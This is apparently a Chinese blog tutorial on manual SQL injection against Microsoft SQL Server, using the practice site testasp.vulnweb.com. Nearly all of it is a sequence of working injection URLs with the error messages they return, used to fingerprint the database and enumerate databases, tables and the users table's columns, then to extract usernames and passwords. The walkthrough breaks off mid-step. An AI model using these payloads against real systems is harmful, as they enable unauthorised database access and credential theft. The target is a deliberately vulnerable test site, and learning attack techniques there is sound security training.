zoukankan      html  css  js  c++  java

  • sql server手工注入

    sql server手工注入

    测试网站testasp.vulnweb.com

    1.

    http://testasp.vulnweb.com/showforum.asp?id=0

    http://testasp.vulnweb.com/showforum.asp?id=0'

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=1

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2

    2.数据库版本

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select @@version)

    3.数据库名

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select db_name())

    4.第一个数据库

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from master..sysdatabases where dbid>4)

    返回Conversion failed when converting the nvarchar value 'acublog' to data type int

    5.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from master..sysdatabases where dbid>4 and name<> 'acublog')

    返回Conversion failed when converting the nvarchar value 'acuforum' to data type int

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from master..sysdatabases where dbid>4 and name<> 'acublog' and name<> 'acuforum')

    返回Conversion failed when converting the nvarchar value 'acuservice' to data type int.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from master..sysdatabases where dbid>4 and name<> 'acublog' and name<> 'acuforum' and name<> 'acuservice')

    返回Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.

    那就这几个数据库了

    6.获取表名

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from sysobjects where xtype='u')

    返回Conversion failed when converting the nvarchar value 'threads' to data type int.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from sysobjects where xtype='u' and name<> 'threads')

    返回Conversion failed when converting the nvarchar value 'users' to data type int

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from sysobjects where xtype='u' and name<> 'threads' and name<> 'users')

    返回Conversion failed when converting the nvarchar value 'forums' to data type int.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from sysobjects where xtype='u' and name<> 'threads' and name<> 'users' and name<> 'forums')

    返回Conversion failed when converting the nvarchar value 'posts' to data type int.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from sysobjects where xtype='u' and name<> 'threads' and name<> 'users' and name<> 'forums' and name<> 'posts')

    返回Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.

    7.users的列名

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'users'))

    返回Conversion failed when converting the nvarchar value 'uname' to data type int.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'users') and name<> 'uname')

    返回Conversion failed when converting the nvarchar value 'upass' to data type int.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'users') and name<> 'uname' and name<> 'upass')

    返回Conversion failed when converting the nvarchar value 'email' to data type int.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'users') and name<> 'uname' and name<> 'upass' and name<> 'email')

    返回Conversion failed when converting the nvarchar value 'realname' to data type int.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'users') and name<> 'uname' and name<> 'upass' and name<> 'email' and name<> 'realname')

    返回Conversion failed when converting the nvarchar value 'avatar' to data type int.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'users') and name<> 'uname' and name<> 'upass' and name<> 'email' and name<> 'realname' and name<> 'avatar')

    返回Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.

    forums的列名

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'forums'))

    8.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 uname from users)

    返回Conversion failed when converting the nvarchar value '--' to data type int.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 upass from users)

    返回Conversion failed when converting the nvarchar value 'none' to data type int.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 uname  from users where id =2)

    返回
  • 相关阅读:
    类函数指针
    resource for machine learning
    蒲丰投针与蒙特卡洛模拟
    IIS5、IIS6、IIS7的ASP.net 请求处理过程比较
    CMD 命令速查手册
    Process, Thread, STA, MTA, COM object
    在托管代码中设置断点(Windbg)
    SidebySide Execution
    .NET Framework 3.5 Architecture
    Overview of the .NET Framework
  • 原文地址:https://www.cnblogs.com/nightnine/p/5479900.html
Copyright © 2011-2022 走看看